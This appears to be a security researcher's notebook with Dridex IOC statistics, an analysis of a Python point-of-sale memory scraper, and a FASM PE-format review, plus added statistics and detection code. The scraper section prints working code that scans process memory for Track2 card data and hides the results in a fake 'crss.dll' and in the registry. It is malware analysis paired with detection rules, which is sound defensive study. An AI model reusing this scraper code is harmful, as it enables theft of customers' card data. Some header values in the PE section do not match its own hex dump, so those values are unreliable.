Dridex Banker Statistics 2016-2017


Source: OSINT

Goal: Obtain statistics related to Dridex trends in 2016, including, but not limited to,

  • (1) a count of all known Dridex nodes 
  • (2) top 10 country infrastructure locations; and
  • (3) timeline histogram of node Dridex detections

Tool: Elasticsearch, Kibana, and Logstash (ELK)

Date Range: 2016-2017

Statistics:
(1) Dridex Count: 329
(2) Top 10 Country Infrastructure Location

geoip.country_name.keyword: Descending   Count
United States 77
Germany 34
United Kingdom 28
France 17
Canada 10
Netherlands 9
Australia 8
Russia 8
Thailand 8
Bulgaria 7

(3) Timeline Histogram


Detection Time IOC geoip.country_name
December 26th 2016; 20:07:34 92.222.129.145 France
December 26th 2016; 20:07:34 91.103.2.132 Ireland
December 23rd 2016; 12:35:14 82.196.5.27 Netherlands
December 22nd 2016; 07:27:36 192.188.58.163 Ecuador
December 22nd 2016; 07:27:36 203.153.165.21 Thailand
December 22nd 2016; 07:27:36 109.74.9.119 Sweden
December 22nd 2016; 07:27:36 69.43.168.214 United States
December 17th 2016; 11:27:38 71.6.155.196 United States
December 17th 2016; 11:27:38 188.68.50.34 Germany
December 15th 2016; 08:55:30 212.200.111.170 Serbia
December 12th 2016; 08:21:30 192.241.236.239 United States
December 9th 2016; 05:23:36 188.120.249.30 Russia
November 21st 2016; 06:34:36 72.249.144.95 United States
November 18th 2016; 13:35:55 188.126.72.179 Sweden
November 18th 2016; 05:55:13 174.37.216.226 United States
November 18th 2016; 05:55:13 166.78.144.68 United States
November 16th 2016; 13:54:38 54.235.86.173 United States
November 15th 2016; 09:53:22 193.136.97.4 Portugal
November 15th 2016; 09:53:22 93.122.165.54 Romania
November 11th 2016; 09:09:04 87.254.45.29 Norway
November 11th 2016; 09:09:04 149.210.158.54 Netherlands
November 5th 2016; 17:01:33 216.127.161.5 United States
November 4th 2016; 04:51:51 77.111.90.85 Hungary
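The three statistics above can be recomputed offline from the exported rows. The following is an added example, not part of the original report and not the ELK configuration that produced it: it parses rows in the table's format, reproduces the node count, the top-N country aggregation and the per-day histogram, and shows the equivalent Elasticsearch aggregation body; the six embedded rows are copied from the table above, and the `@timestamp` field name is an assumption about the Logstash index.

```python
import ipaddress
import re
from collections import Counter, OrderedDict
from datetime import datetime

# One exported row: "<Month> <day><ordinal> <year>; <hh:mm:ss> <ip> <country name>"
ROW_RE = re.compile(
    r'^(?P<month>[A-Z][a-z]+) (?P<day>\d{1,2})(?:st|nd|rd|th) (?P<year>\d{4}); '
    r'(?P<time>\d{2}:\d{2}:\d{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<country>.+)$')

# Six rows copied from the detection table above (the full export is not embedded).
SAMPLE_ROWS = [
    'December 26th 2016; 20:07:34 92.222.129.145 France',
    'December 26th 2016; 20:07:34 91.103.2.132 Ireland',
    'December 23rd 2016; 12:35:14 82.196.5.27 Netherlands',
    'December 22nd 2016; 07:27:36 69.43.168.214 United States',
    'December 17th 2016; 11:27:38 71.6.155.196 United States',
    'November 18th 2016; 05:55:13 174.37.216.226 United States',
]


def parse_row(line):
    """Parse one row into (timestamp, ip, country). Raises ValueError on a malformed
    row or an invalid address rather than silently skipping it."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError('unrecognised row: %r' % line)
    # Drop the ordinal suffix (26th -> 26) before handing the date to strptime.
    stamp = '%s %s %s %s' % (m.group('month'), m.group('day'), m.group('year'), m.group('time'))
    ts = datetime.strptime(stamp, '%B %d %Y %H:%M:%S')
    ipaddress.ip_address(m.group('ip'))           # rejects octets above 255
    return ts, m.group('ip'), m.group('country').strip()


def unique_nodes(rows):
    """Statistic (1): distinct IOC addresses, i.e. the count of known nodes."""
    return len({ip for _, ip, _ in rows})


def top_countries(rows, n=10):
    """Statistic (2): what the Kibana terms aggregation on geoip.country_name.keyword
    returns, sorted by count descending with ties broken alphabetically."""
    counts = Counter(country for _, _, country in rows)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:n]


def daily_histogram(rows):
    """Statistic (3): detections per calendar day, oldest first (a 1-day date histogram)."""
    return OrderedDict(sorted(Counter(ts.date() for ts, _, _ in rows).items()))


def kibana_equivalent_query():
    """The Elasticsearch request body behind those two panels, in the ES 5.x syntax
    current in 2016-2017 (newer releases spell the interval calendar_interval)."""
    return {'size': 0, 'aggs': {
        'countries': {'terms': {'field': 'geoip.country_name.keyword', 'size': 10,
                                'order': {'_count': 'desc'}}},
        'timeline': {'date_histogram': {'field': '@timestamp', 'interval': '1d'}}}}
```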

Point-of-Sale Malware Instrumentation Analysis: Memory Scraper in Python

Title: Memory Scanning a Windows Process in Python Using winappdbg
Purpose: Analyze a Python point-of-sale (PoS) malware sample that scans process memory for credit card data

Analysis Steps:
(1) Display the Windows version and the current architecture

from winappdbg import *
System.os, System.arch, System.bits

(2) Create a snapshot of running processes

System.request_debug_privileges(), System.scan_processes()

(3) Obtain the local username (from getpass.getuser())
(4) Create a writeable file in %APPDATA%

import getpass
UserName = getpass.getuser()
dump_writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\crss.dll', 'w+')

(5) Obtain all processes that match the requested filenames:

(6) Get a memory map of the process

memoryMap = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)

(7) For each memory block in the map, read its base address and size, its state (free, reserved or committed; the scraper looks for win32.MEM_COMMIT), its page protection bits, and its memory type:
(8) Read the data from memory

if mbi.has_content() and mbi.State == win32.MEM_COMMIT:
    data = process.read(mbi.BaseAddress, mbi.RegionSize)

(9) Implement a simple Regular Expression looking for Track2 data

dump_regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', data)
dump_data.append(dump_regex)

(10) Beautify the extracted data
(11) Write dump data into crss.dll
(12) Write the data to registry

import _winreg
hKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Internet Explorer\\")
_winreg.SetValueEx(hKey, "Test", 0, _winreg.REG_BINARY, "666")


Missing features are as follows:
(1) Encode Saved Data
(2) Add Luhn Algorithm
(3) Create a multithreaded process for this algorithm
(4) Send data to email/C2
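Seen from the defender's side, the steps above leave host artefacts that are straightforward to alert on. The detection logic below is an added example (not part of the analysed sample) run over constructed Sysmon-style events; the field names follow Sysmon's ProcessAccess (10), FileCreate (11) and RegistryEvent (13) schemas, and the threshold of three distinct memory-read targets is an assumption.

```python
import re
from collections import defaultdict

# Artefacts taken from the analysis steps above: the dump file dropped under
# Application Data with a csrss-lookalike name, and the REG_BINARY value written
# under the Internet Explorer key. Sysmon's registry events spell HKCU as HKU\<SID>.
DUMP_FILE_RE = re.compile(r'\\(?:Application Data|AppData\\Roaming)\\crss\.dll$', re.I)
REG_VALUE_RE = re.compile(r'^HKU\\[^\\]+\\SOFTWARE\\Microsoft\\Internet Explorer\\Test$', re.I)
PROCESS_VM_READ = 0x0010          # access right needed to read another process's memory
SCRAPE_TARGET_THRESHOLD = 3       # assumption: distinct targets one reader must open to alert

# Constructed sample events in Sysmon's field names (EventID 10 = ProcessAccess,
# 11 = FileCreate, 13 = RegistryEvent value set). Not taken from a real host.
SAMPLE_EVENTS = [
    {'EventID': 10, 'SourceImage': 'C:\\Python27\\python.exe',
     'TargetImage': 'C:\\POS\\register.exe', 'GrantedAccess': '0x1FFFFF'},
    {'EventID': 10, 'SourceImage': 'C:\\Python27\\python.exe',
     'TargetImage': 'C:\\Windows\\explorer.exe', 'GrantedAccess': '0x1FFFFF'},
    {'EventID': 10, 'SourceImage': 'C:\\Python27\\python.exe',
     'TargetImage': 'C:\\Program Files\\Internet Explorer\\iexplore.exe', 'GrantedAccess': '0x1FFFFF'},
    {'EventID': 10, 'SourceImage': 'C:\\Windows\\System32\\svchost.exe',      # benign:
     'TargetImage': 'C:\\Windows\\explorer.exe', 'GrantedAccess': '0x1000'},  # QUERY_LIMITED_INFORMATION only
    {'EventID': 11, 'Image': 'C:\\Python27\\python.exe',
     'TargetFilename': 'C:\\Documents and Settings\\cashier\\Application Data\\crss.dll'},
    {'EventID': 13, 'Image': 'C:\\Python27\\python.exe', 'Details': 'Binary Data',
     'TargetObject': 'HKU\\S-1-5-21-1111-2222-3333-1001\\SOFTWARE\\Microsoft\\Internet Explorer\\Test'},
    {'EventID': 11, 'Image': 'C:\\Windows\\explorer.exe',
     'TargetFilename': 'C:\\Documents and Settings\\cashier\\My Documents\\notes.txt'},
]


def detect_memory_scraper(events):
    """Return (rule, source_image, evidence) findings. The first two rules are direct
    IoCs from the notes; the third catches the behaviour itself: one process opening
    several others with PROCESS_VM_READ, which scan_processes + get_memory_map needs."""
    findings = []
    readers = defaultdict(set)          # SourceImage -> targets opened with VM_READ
    for ev in events:
        eid = ev.get('EventID')
        if eid == 11 and DUMP_FILE_RE.search(ev.get('TargetFilename', '')):
            findings.append(('dump_file_drop', ev['Image'], ev['TargetFilename']))
        elif eid == 13 and REG_VALUE_RE.match(ev.get('TargetObject', '')) \
                and ev.get('Details', '').startswith('Binary Data'):
            findings.append(('registry_staging', ev['Image'], ev['TargetObject']))
        elif eid == 10 and int(ev.get('GrantedAccess', '0x0'), 16) & PROCESS_VM_READ:
            readers[ev['SourceImage']].add(ev['TargetImage'])
    for source, targets in sorted(readers.items()):
        if len(targets) >= SCRAPE_TARGET_THRESHOLD:
            findings.append(('cross_process_memory_read', source, sorted(targets)))
    return findings
```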

FASM: Portable Executable Review

Source: Iczelion
Goal: Advance and review FASM programming.

I. FASM source code (as compiled):
  format PE GUI 4.0
  entry start

  include '%fasminc%\win32a.inc'

  section '.data' data readable writeable
         msgText       db     'Message Text',0
         msgCaption    db     'Message Caption',0

  section '.code' code readable executable
         start:
                invoke MessageBox,HWND_DESKTOP,msgText,msgCaption,MB_OK + MB_ICONINFORMATION
                invoke ExitProcess,0

  section '.idata' import data readable
         library       KERNEL32,     'KERNEL32.DLL',\
                       USER32,       'USER32.DLL'

         import KERNEL32,\
                ExitProcess,         'ExitProcess'

         import USER32,\
                MessageBox,          'MessageBoxA'

II. The same program after compiling, dumped as db byte lines (hex):

    db 4Dh, 5Ah, 80h, 00h, 01h, 00h, 00h, 00h, 04h, 00h, 10h, 00h, 0FFh, 0FFh, 00h, 00h
    db 40h, 01h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 80h, 00h, 00h, 00h
    db 0Eh, 1Fh, 0BAh, 0Eh, 00h, 0B4h, 09h, 0CDh, 21h, 0B8h, 01h, 4Ch, 0CDh, 21h, 54h, 68h
    db 69h, 73h, 20h, 70h, 72h, 6Fh, 67h, 72h, 61h, 6Dh, 20h, 63h, 61h, 6Eh, 6Eh, 6Fh
    db 74h, 20h, 62h, 65h, 20h, 72h, 75h, 6Eh, 20h, 69h, 6Eh, 20h, 44h, 4Fh, 53h, 20h
    db 6Dh, 6Fh, 64h, 65h, 2Eh, 0Dh, 0Ah, 24h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 50h, 45h, 00h, 00h, 4Ch, 01h, 03h, 00h, 3Fh, 65h, 0ECh, 58h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 0E0h, 00h, 0Fh, 01h, 0Bh, 01h, 01h, 47h, 00h, 02h, 00h, 00h
    db 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 20h, 00h, 00h, 00h, 20h, 00h, 00h
    db 00h, 10h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 10h, 00h, 00h, 00h, 02h, 00h, 00h
    db 01h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 40h, 00h, 00h, 00h, 02h, 00h, 00h, 2Ch, 67h, 00h, 00h, 02h, 00h, 00h, 00h
    db 00h, 10h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 00h, 01h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 30h, 00h, 00h, 96h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 2Eh, 64h, 61h, 74h, 61h, 00h, 00h, 00h
    db 1Dh, 00h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 02h, 00h, 00h, 00h, 02h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 0C0h
    db 2Eh, 63h, 6Fh, 64h, 65h, 00h, 00h, 00h, 1Ch, 00h, 00h, 00h, 00h, 20h, 00h, 00h
    db 00h, 02h, 00h, 00h, 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 20h, 00h, 00h, 60h, 2Eh, 69h, 64h, 61h, 74h, 61h, 00h, 00h
    db 96h, 00h, 00h, 00h, 00h, 30h, 00h, 00h, 00h, 02h, 00h, 00h, 00h, 06h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 40h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 4Dh, 65h, 73h, 73h, 61h, 67h, 65h, 20h, 54h, 65h, 78h, 74h, 00h, 4Dh, 65h, 73h
    db 73h, 61h, 67h, 65h, 20h, 43h, 61h, 70h, 74h, 69h, 6Fh, 6Eh, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 6Ah, 40h, 68h, 0Dh, 10h, 40h, 00h, 68h, 00h, 10h, 40h, 00h, 6Ah, 00h, 0FFh, 15h
    db 80h, 30h, 40h, 00h, 6Ah, 00h, 0FFh, 15h, 60h, 30h, 40h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 58h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 3Ch, 30h, 00h, 00h
    db 60h, 30h, 00h, 00h, 78h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 4Ah, 30h, 00h, 00h, 80h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 4Bh, 45h, 52h, 4Eh
    db 45h, 4Ch, 33h, 32h, 2Eh, 44h, 4Ch, 4Ch, 00h, 00h, 55h, 53h, 45h, 52h, 33h, 32h
    db 2Eh, 44h, 4Ch, 4Ch, 00h, 00h, 00h, 00h, 68h, 30h, 00h, 00h, 00h, 00h, 00h, 00h
    db 68h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 45h, 78h, 69h, 74h, 50h, 72h
    db 6Fh, 63h, 65h, 73h, 73h, 00h, 00h, 00h, 88h, 30h, 00h, 00h, 00h, 00h, 00h, 00h
    db 88h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 4Dh, 65h, 73h, 73h, 61h, 67h
    db 65h, 42h, 6Fh, 78h, 41h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h

III. Portable executable header

  IMAGE_DOS_HEADER:                         ;start : 00 (0) to 3F (63)
         .e_magic      dw     0x5A4D        ;00 01
         .e_cblp       dw     0x0080        ;02 03
         .e_cp         dw     0x0001        ;04 05
         .e_crlc       dw     0x0000        ;06 07
         .e_cparhdr    dw     0x0004        ;08 09
         .e_minalloc   dw     0x0010        ;10 11
         .e_maxalloc   dw     0xFFFF        ;12 13
         .e_ss         dw     0x0000        ;14 15
         .e_sp         dw     0x0140        ;16 17
         .e_csum       dw     0x0000        ;18 19
         .e_ip         dw     0x0000        ;20 21
         .e_cs         dw     0x0000        ;22 23
         .e_lfarlc     dw     0x0040        ;24 25
         .e_ovno       dw     0x0000        ;26 27
         .e_res        rw     4             ;28 29 | 30 31 | 32 33 | 34 35
         .e_oemid      dw     0x0000        ;36 37
         .e_oeminfo    dw     0x0000        ;38 39
         .e_res2       rw     10            ;40 41 | 42 43 | 44 45 | 46 47 | 48 49 | 50 51
         .e_lfanew     dd     0x00000080    ;52 53 | 54 55 | 56 57 | 58 59
                                            ;60 61 62 63
    typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
        WORD   e_magic;                     // Magic number
        WORD   e_cblp;                      // Bytes on last page of file
        WORD   e_cp;                        // Pages in file
        WORD   e_crlc;                      // Relocations
        WORD   e_cparhdr;                   // Size of header in paragraphs
        WORD   e_minalloc;                  // Minimum extra paragraphs needed
        WORD   e_maxalloc;                  // Maximum extra paragraphs needed
        WORD   e_ss;                        // Initial (relative) SS value
        WORD   e_sp;                        // Initial SP value
        WORD   e_csum;                      // Checksum
        WORD   e_ip;                        // Initial IP value
        WORD   e_cs;                        // Initial (relative) CS value
        WORD   e_lfarlc;                    // File address of relocation table
        WORD   e_ovno;                      // Overlay number
        WORD   e_res[4];                    // Reserved words
        WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
        WORD   e_oeminfo;                   // OEM information; e_oemid specific
        WORD   e_res2[10];                  // Reserved words
        LONG   e_lfanew;                    // File address of new exe header
    } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
  IMAGE_NT_HEADERS:                                ;start : 80 (128) to 1EF (495)
         .Signature           db     'PE',0,0      ;128 131


         IMAGE_FILE_HEADER:                        ;start : 84 (132) to 97 (151)
                .Machine                           dw     0x014C        ;132 133 for intel 386
                .NumberOfSection                   dw     0x0003        ;134 135
                .TimeDateStamp                     dd     %t            ;136 139
                .PointerToSymbolTable              dd     0             ;140 143
                .NumberOfSymbols                   dd     0             ;144 147
                .SizeOfOptionalHeader              dw     0x00E0        ;148 149
                .Characteristic                    dw     0x818F        ;150 151

============= Portable Executable Format Walkthrough =============

; References:
